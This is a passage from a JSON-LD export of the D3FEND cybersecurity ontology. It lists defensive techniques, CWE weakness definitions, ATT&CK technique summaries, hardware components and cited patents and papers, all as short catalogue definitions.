system health and build resilience with tamper and heartbeat alerts, recorder failover where needed, and accurate time synchronization for correlation.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DHS-CCTV-Technology-Handbook"
        },
        {
          "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
        },
        {
          "@id": "d3f:Reference-ONVIF-ProfileS"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:DigitalCamera"
      },
      "d3f:synonym": [
        "CCTV Surveillance",
        "Video Monitoring"
      ],
      "rdfs:label": "Video Surveillance",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessMonitoring"
        },
        {
          "@id": "_:N5cf71bdf63d04e5883484a37b2ad2794"
        }
      ]
    },
    {
      "@id": "_:N5cf71bdf63d04e5883484a37b2ad2794",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalCamera"
      }
    },
    {
      "@id": "d3f:CWE-1267",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1267",
      "d3f:definition": "The product uses an obsolete encoding mechanism to implement access controls.",
      "rdfs:label": "Policy Uses Obsolete Encoding",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:EX-0017.01",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0017.01",
      "d3f:definition": "A direct-ascent ASAT is often the most commonly thought of threat to space assets. It typically involves a medium- or long-range missile launching from the Earth to damage or destroy a satellite in orbit. This form of attack is often easily attributed due to the missile launch which can be easily detected. Due to the physical nature of the attacks, they are irreversible and provide the attacker with near real-time confirmation of success. Direct-ascent ASATs create orbital debris which can be harmful to other objects in orbit. Lower altitudes allow for more debris to burn up in the atmosphere, while attacks at higher altitudes result in more debris remaining in orbit, potentially damaging other spacecraft in orbit.*\n\n*https://aerospace.csis.org/aerospace101/counterspace-weapons-101",
      "rdfs:label": "Direct Ascent ASAT - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0017/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0017"
      },
      "skos:prefLabel": "Direct Ascent ASAT"
    },
    {
      "@id": "d3f:CWE-329",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-329",
      "d3f:definition": "The product generates and uses a predictable initialization Vector (IV) with Cipher Block Chaining (CBC) Mode, which causes algorithms to be susceptible to dictionary attacks when they are encrypted under the same key.",
      "rdfs:label": "Generation of Predictable IV with CBC Mode",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1204"
        },
        {
          "@id": "d3f:CWE-573"
        }
      ]
    },
    {
      "@id": "d3f:T1076",
      "@type": "owl:Class",
      "d3f:attack-id": "T1076",
      "d3f:definition": "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1021.001",
      "rdfs:label": "Remote Desktop Protocol",
      "rdfs:seeAlso": {
        "@id": "d3f:T1021.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForProcessHollowingDetection_CarbonBlackInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170272462A1"
      },
      "d3f:kb-abstract": "A method and system for remediating a process hollowing intrusion on a user device comprising detecting a process starting on the user device, preparing the process to monitor Application Programming Interface (API) calls between the process and an operating system of the user device, determining whether the process is associated with a process hollowing intrusion based on information associated with the process and/or the API calls, and executing security policies against the process associated with the process hollowing intrusion. In examples, it is determined whether the child process is associated with a process hollowing intrusion in response to determining whether one or more API calls associated with known process hollowing intrusions modify executable memory of and/or modify an entry point address of the child process.",
      "d3f:kb-author": "Jeffrey Albin Kraemer, Paul Matthew Drapeau",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Carbon Black Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSelf-ModificationDetection"
      },
      "d3f:kb-reference-title": "System and Method for Process Hollowing Detection",
      "rdfs:label": "Reference - System and Method for Process Hollowing Detection - Carbon Black Inc"
    },
    {
      "@id": "d3f:HardwareClockDeviceDriver",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A device driver for a hardware clock.",
      "d3f:drives": {
        "@id": "d3f:HardwareClock"
      },
      "rdfs:label": "Hardware Clock Device Driver",
      "rdfs:seeAlso": {
        "@id": "https://docs.kernel.org/admin-guide/rtc.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDriver"
        },
        {
          "@id": "_:Nb40e0b7827d54d7481276865c0f8e9e6"
        }
      ]
    },
    {
      "@id": "_:Nb40e0b7827d54d7481276865c0f8e9e6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:drives"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareClock"
      }
    },
    {
      "@id": "d3f:Reference-ReachabilityGraphBasedSafeRemediationsforSecuirytofOnPremiseAndCloudComputingEnvironments",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patentimages.storage.googleapis.com/23/c1/a5/d78b3d4f275070/US11637861.pdf"
      },
      "d3f:kb-abstract": "A method for securing a networked computer system executing an application includes identifying a vulnerable computer resource in the networked computer system, determining all computer resources in the networked computer system that are accessible from, or are accessed by, the vulnerable computer resource, and prioritizing implementation of a remediation action to secure the vulnerable computer resource if a vulnerability path extends from the vulnerable computer resource to a critical computer resource that contains sensitive information. The remediation action to secure the vulnerable computer resource is a safe remediation action that does not impact availability of the application executing on the networked computer system.",
      "d3f:kb-author": "Siddharth Sukumar Burle, Ajoy Kumar, Manish Jain",
      "d3f:kb-reference-of": {
        "@id": "d3f:NetworkVulnerabilityAssessment"
      },
      "d3f:kb-reference-title": "Reachability graph-based safe remediations for security of on-premise and cloud computing environments",
      "rdfs:label": "Reference - Reachability graph-based safe remediations for security of on-premise and cloud computing environments"
    },
    {
      "@id": "d3f:Reference-DetectionOfMaliciousIDNHomoglyphDomains",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "http://essay.utwente.nl/79263/1/Yazdani_MA_EEMCS.pdf"
      },
      "d3f:kb-abstract": "At early stages of Internet development, users were only able to register or access domains with ASCII characters. The introduction of IDN (Internationalized Domain Name) which uses the larger Unicode character set, made it possible for regional users to deal with domain names using their local language alphabet. Beside the advantages provided by IDN, a new type of network threats has also emerged. The reason behind this is that there are many similar-looking characters in Unicode system, called homoglyphs. These characters could be used by an attacker to lure users by replacing one or more characters of a benign domain.",
      "d3f:kb-author": "Ramin Yazdani",
      "d3f:kb-organization": "University of Twente",
      "d3f:kb-reference-of": {
        "@id": "d3f:HomoglyphDenylisting"
      },
      "d3f:kb-reference-title": "Detection of Malicious IDN Homoglyph Domains Using Active DNS Measurements",
      "rdfs:label": "Reference - Detection of Malicious IDNHomoglyph Domains"
    },
    {
      "@id": "d3f:BusinessCommunicationPlatformClient",
      "@type": "owl:Class",
      "d3f:definition": "Client software to enable the process of sharing information between employees within and outside a company.  Business communication encompasses topics such as marketing, brand management, customer relations, consumer behavior, advertising, public relations, corporate communication, community engagement, reputation management, interpersonal communication, employee engagement, and event management. It is closely related to the fields of professional communication and technical communication.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Business_communication"
      },
      "rdfs:label": "Business Communication Platform Client",
      "rdfs:subClassOf": {
        "@id": "d3f:CollaborativeSoftware"
      }
    },
    {
      "@id": "d3f:OTStopCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a device to stop a service/program.",
      "rdfs:label": "OT Stop Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:N249f0584bc0c4ec0a12ea2c899b9cb23"
        },
        {
          "@id": "_:N35c7b83c968947beb23bf6ce8242965d"
        },
        {
          "@id": "_:Ne5c037f8e16846b0bbc0b776ffe1a2d9"
        }
      ]
    },
    {
      "@id": "_:N249f0584bc0c4ec0a12ea2c899b9cb23",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:N35c7b83c968947beb23bf6ce8242965d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTStopCommand"
      }
    },
    {
      "@id": "_:Ne5c037f8e16846b0bbc0b776ffe1a2d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTRunCommandEvent"
      }
    },
    {
      "@id": "d3f:T1432",
      "@type": "owl:Class",
      "d3f:attack-id": "T1432",
      "d3f:definition": "An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files containing contact list data.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1636.003",
      "rdfs:label": "Access Contact List - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1636.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Access Contact List"
    },
    {
      "@id": "d3f:Reference-IntroductoryComputerForensics",
      "@type": [
        "owl:NamedIndividual",
        "d3f:BookReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://core.ac.uk/download/pdf/326762883.pdf"
      },
      "d3f:kb-author": "Xiaodong Lin",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileMetadataValueVerification"
      },
      "d3f:kb-reference-title": "Introductory Computer Forensics",
      "rdfs:label": "Reference - Introductory Computer Forensics"
    },
    {
      "@id": "d3f:Reference-TivoliApplicationDependencyDiscoverManager7_3_0DependenciesBetweenResources",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.ibm.com/docs/en/taddm/7.3.0?topic=model-dependencies-between-resources"
      },
      "d3f:kb-organization": "IBM",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DataExchangeMapping"
        },
        {
          "@id": "d3f:ServiceDependencyMapping"
        },
        {
          "@id": "d3f:SystemDependencyMapping"
        }
      ],
      "d3f:kb-reference-title": "Tivoli Application Dependency Discovery Manager 7.3.0 - Dependencies between resources",
      "rdfs:label": "Reference - Tivoli Application Dependency Discovery Manager 7.3.0 - Dependencies between resources"
    },
    {
      "@id": "d3f:T1559",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1559",
      "d3f:definition": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern.",
      "d3f:injects": {
        "@id": "d3f:InterprocessCommunication"
      },
      "rdfs:label": "Inter-Process Communication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "_:N118b555a8d854c8ba55face49d0b3543"
        }
      ]
    },
    {
      "@id": "_:N118b555a8d854c8ba55face49d0b3543",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:injects"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InterprocessCommunication"
      }
    },
    {
      "@id": "d3f:CWE-115",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-115",
      "d3f:definition": "The product misinterprets an input, whether from an attacker or another product, in a security-relevant fashion.",
      "rdfs:label": "Misinterpretation of Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-436"
      }
    },
    {
      "@id": "d3f:CWE-293",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-293",
      "d3f:definition": "The referer field in HTTP requests can be easily modified and, as such, is not a valid means of message integrity checking.",
      "d3f:synonym": "referrer",
      "rdfs:label": "Using Referer Field for Authentication",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-290"
      }
    },
    {
      "@id": "d3f:LocalResourceAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:LocalResource"
      },
      "d3f:definition": "Ephemeral digital artifact comprising a request of a local resource and any response from that resource.",
      "rdfs:label": "Local Resource Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ResourceAccess"
        },
        {
          "@id": "_:N24a09ad33ed84cc58aeb1e62dc600124"
        }
      ],
      "skos:altLabel": "Endpoint Resource Access"
    },
    {
      "@id": "_:N24a09ad33ed84cc58aeb1e62dc600124",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalResource"
      }
    },
    {
      "@id": "d3f:T1630",
      "@type": "owl:Class",
      "d3f:attack-id": "T1630",
      "d3f:definition": "Adversaries may delete, alter, or hide generated artifacts on a device, including files, jailbreak status, or the malicious application itself. These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This may compromise the integrity of mobile security solutions by causing notable events or information to go unreported.",
      "rdfs:label": "Indicator Removal on Host - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Indicator Removal on Host"
    },
    {
      "@id": "d3f:DS0020",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A point-in-time copy of cloud volumes (files, settings, etc.) that can be created and/or deployed in cloud environments",
      "d3f:exactly": {
        "@id": "d3f:VolumeSnapshot"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Volume Metadata component",
      "rdfs:label": "Snapshot (ATT&CK DS)"
    },
    {
      "@id": "d3f:T1550.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:SessionCookie"
      },
      "d3f:attack-id": "T1550.004",
      "d3f:definition": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)",
      "d3f:produces": {
        "@id": "d3f:WebNetworkTraffic"
      },
      "rdfs:label": "Web Session Cookie",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1550"
        },
        {
          "@id": "_:Nf3c3e8ce44ad47f681594cc8fd1f8855"
        },
        {
          "@id": "_:Nda3fb74d5e8347e8868ab34efc1c0921"
        }
      ]
    },
    {
      "@id": "_:Nf3c3e8ce44ad47f681594cc8fd1f8855",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SessionCookie"
      }
    },
    {
      "@id": "_:Nda3fb74d5e8347e8868ab34efc1c0921",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebNetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1535",
      "@type": "owl:Class",
      "d3f:attack-id": "T1535",
      "d3f:definition": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.",
      "rdfs:label": "Unused/Unsupported Cloud Regions",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1495",
      "@type": "owl:Class",
      "d3f:attack-id": "T1495",
      "d3f:definition": "Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.",
      "rdfs:label": "Firmware Corruption",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:T1070.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1070.008",
      "d3f:definition": "Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests.",
      "rdfs:label": "Clear Mailbox Data",
      "rdfs:subClassOf": {
        "@id": "d3f:T1070"
      }
    },
    {
      "@id": "d3f:CWE-1060",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1060",
      "d3f:definition": "The product performs too many data queries without using efficient data processing functionality such as stored procedures.",
      "rdfs:label": "Excessive Number of Inefficient Server-Side Data Accesses",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:T1216.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1216.002",
      "d3f:definition": "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)",
      "rdfs:label": "SyncAppvPublishingServer",
      "rdfs:subClassOf": {
        "@id": "d3f:T1216"
      }
    },
    {
      "@id": "d3f:Reference-SNMPNetworkAutoDiscovery",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.device42.com/auto-discovery/network-auto-discovery/"
      },
      "d3f:kb-abstract": "SNMP, or Simple Network Management Protocol, is a protocol and a standard that is supported by just about any managed network-connected hardware. There are three widely deployed versions: SNMP v1, v2c (most commonly used), and v3. SNMP is typically utilized read-only, but supports read/write, and by default utilized port 161. SNMP exposes management data in the form of ‘variables’, which are organized in what is known as a MIB, or “Management Information Base”. A MIB essentially describes the variables available on a given system, each of which can be remotely queried via SNMP.",
      "d3f:kb-organization": "Device 42",
      "d3f:kb-reference-of": {
        "@id": "d3f:ActiveLogicalLinkMapping"
      },
      "d3f:kb-reference-title": "SNMP - Network Auto Discovery",
      "rdfs:label": "Reference - SNMP - Network Auto-Discovery"
    },
    {
      "@id": "d3f:T1598.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1598.002",
      "d3f:definition": "Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.",
      "rdfs:label": "Spearphishing Attachment",
      "rdfs:subClassOf": {
        "@id": "d3f:T1598"
      }
    },
    {
      "@id": "d3f:CWE-54",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-54",
      "d3f:definition": "The product accepts path input in the form of trailing backslash ('filedir\\') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'filedir\\' (Trailing Backslash)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-162"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:MemoryProtectionUnit",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A Memory Protection Unit (MPU) is a processor component that enforces access control policies on memory regions to ensure the integrity, security, and proper operation of a computing system.",
      "d3f:synonym": "MPU",
      "rdfs:label": "Memory Protection Unit",
      "rdfs:subClassOf": {
        "@id": "d3f:ProcessorComponent"
      }
    },
    {
      "@id": "d3f:CWE-1322",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1322",
      "d3f:definition": "The product uses a non-blocking model that relies on a single threaded process for features such as scalability, but it contains code that can block when it is invoked.",
      "rdfs:label": "Use of Blocking Code in Single-threaded, Non-blocking Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-834"
      }
    },
    {
      "@id": "d3f:MemoryManagementUnit",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:TranslationLookasideBuffer"
      },
      "d3f:creates": {
        "@id": "d3f:VirtualAddress"
      },
      "d3f:definition": "A computer’s memory management unit (MMU) is the physical hardware that handles its virtual memory and caching operations. The MMU is usually located within the computer’s central processing unit (CPU), but sometimes operates in a separate integrated chip (IC).",
      "d3f:manages": [
        {
          "@id": "d3f:PageTable"
        },
        {
          "@id": "d3f:Storage"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://www.techopedia.com/definition/4768/memory-management-unit-mmu"
      },
      "rdfs:label": "Memory Management Unit",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/page/Memory_management_unit"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessorComponent"
        },
        {
          "@id": "_:N651e082fed7f44c28887eb4db2454a4d"
        },
        {
          "@id": "_:N94c64d8998854a6c90e22c8c978759f0"
        },
        {
          "@id": "_:N0ae3f9eef2f74476b92381dea13bd5d3"
        },
        {
          "@id": "_:N4ade58f11ebd46108898fb386f51b68e"
        }
      ]
    },
    {
      "@id": "_:N651e082fed7f44c28887eb4db2454a4d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TranslationLookasideBuffer"
      }
    },
    {
      "@id": "_:N94c64d8998854a6c90e22c8c978759f0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:VirtualAddress"
      }
    },
    {
      "@id": "_:N0ae3f9eef2f74476b92381dea13bd5d3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PageTable"
      }
    },
    {
      "@id": "_:N4ade58f11ebd46108898fb386f51b68e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Storage"
      }
    },
    {
      "@id": "d3f:TimerEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving a timer artifact, characterized by the initiation, expiration, modification, or cancellation of a countdown or interval-based temporal mechanism.",
      "rdfs:label": "Timer Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N2de45ef99fc346b89987d848b580ea6e"
        }
      ]
    },
    {
      "@id": "_:N2de45ef99fc346b89987d848b580ea6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Timer"
      }
    },
    {
      "@id": "d3f:ParentProcess",
      "@type": "owl:Class",
      "d3f:definition": "In computing, a parent process is a process that has created one or more child processes.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Parent_process"
      },
      "rdfs:label": "Parent Process",
      "rdfs:seeAlso": {
        "@id": "dbr:Child_process"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:Reference-NearMemoryInMemoryDetectionofFilelessMalware",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://web.inf.ufpr.br/mazalves/wp-content/uploads/sites/13/2021/03/memsys2020.pdf"
      },
      "d3f:kb-abstract": "Fileless malware are recent threats to computer systems that load directly into memory, and whose aim is to prevent anti-viruses (AVs) from successfully matching byte patterns against suspicious files written on disk. Their detection requires that software-based AVs continuously scan memory, which is expensive due to repeated locks and polls. However, research advances introduced near-memory and in-memory processing, which allow memory controllers to trigger basic computations without moving data to the CPU. In this paper, we address AVs performance overhead by moving them to the hardware, i.e., we propose instrumenting processors’ memory controller or smart memories (near- and in-memory malware detection, respectively) to accelerate memory scanning procedures. To do so, we present MINI-ME, the Malware Identification based on Near- and In-Memory Evaluation mechanism, a hardware-based AV accelerator that interrupts the program’s execution if malicious patterns are discovered in their memory. We prototyped MINI-ME in a simulator and tested it with a set of 21 thousand in-the-wild malware samples, which resulted in multiple signatures matching with less than 1% of performance overhead and rates of 100% detection, and zero false-positives and false-negatives.",
      "d3f:kb-author": "Marcus Botacin, André Grégio, Marco Antonio Zanata Alves",
      "d3f:kb-reference-of": {
        "@id": "d3f:HostShutdown"
      },
      "d3f:kb-reference-title": "Near-Memory & In-Memory Detection of Fileless Malware",
      "rdfs:label": "Reference - Near-Memory & In-Memory Detection of Fileless Malware"
    },
    {
      "@id": "d3f:exactly",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x exactly y: The entity x is identical to or fully corresponds to entity y.",
      "rdfs:label": "exactly",
      "rdfs:subPropertyOf": {
        "@id": "d3f:semantic-relation"
      }
    },
    {
      "@id": "d3f:RegOpenKeyTransactedW",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetSystemConfigValue"
      ],
      "rdfs:label": "RegOpenKeyTransactedW"
    },
    {
      "@id": "d3f:NetworkTrafficSignatureAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkTrafficSignatureAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-NTSA",
      "d3f:definition": "Analyzing network traffic and compares it to known signatures",
      "d3f:kb-article": "## How it works\n\nNetwork signature analysis relies on predefined patterns, or signatures, to identify malicious network activity. These signatures typically match against specific byte sequences, packet header information, or protocol anomalies indicative of known threats.\n\nThe process works as follows:\n\n* Packet Capture: Network traffic is captured on an interface or port, resulting in a stream of raw packets.\n* Preprocessing: The captured packets are preprocessed, cleaning and normalizing the data for efficient analysis.\n* Signature Matching: Each packet is compared against a database of signatures using dedicated engines.\n\n## Considerations\n\n### False Negatives\n\nNetwork signature analysis is susceptible to generating false negatives. These occur when malicious activity evades detection due to limitations in the signature-based approach. Here are some common causes:\n\n* Evolving threats: Attackers frequently modify their tactics, rendering existing signatures ineffective against new variants.\n* Obfuscation: Attackers may disguise malicious content using encryption, encoding, or other techniques to bypass signature detection.\n* Limited visibility: Signatures rely on specific patterns. If crucial information is encrypted or hidden, the signature might miss the threat.\n* Zero-day attacks: By definition, new and unknown attacks lack corresponding signatures, allowing them to pass undetected.\n\n### False Positives\n\nNetwork signature analysis is susceptible to generating false positives. These occur when the signature analysis triggers an alert for benign traffic. Common causes include:\n\n* Overly broad signatures: Rules designed to be too general might match harmless activities, generating false alarms.\n* Network misconfigurations: Improperly configured devices or legitimate network activity can mimic malicious patterns, triggering false positives.\n* Data errors: Corrupted or incomplete network data can lead to misinterpretations and false alerts.\n\n",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemAndMethodForStrategicAntiMalwareMonitoring"
      },
      "rdfs:label": "Network Traffic Signature Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N90fe1ab01be944cb9122081c2a5fc33c"
        }
      ]
    },
    {
      "@id": "_:N90fe1ab01be944cb9122081c2a5fc33c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-3_4",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Risk Assessment | Predictive Cyber Analytics",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:FileAnalysis"
        },
        {
          "@id": "d3f:IdentifierAnalysis"
        },
        {
          "@id": "d3f:MessageAnalysis"
        },
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "d3f:UserBehaviorAnalysis"
        }
      ],
      "rdfs:label": "RA-3(4)"
    },
    {
      "@id": "d3f:TA0040",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to manipulate, interrupt, or destroy your systems and data.\n\nImpact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries' goals. These techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.",
      "d3f:display-order": 12,
      "rdfs:label": "Impact",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:UserInitConfigurationFile",
      "@type": [
        "owl:Class",
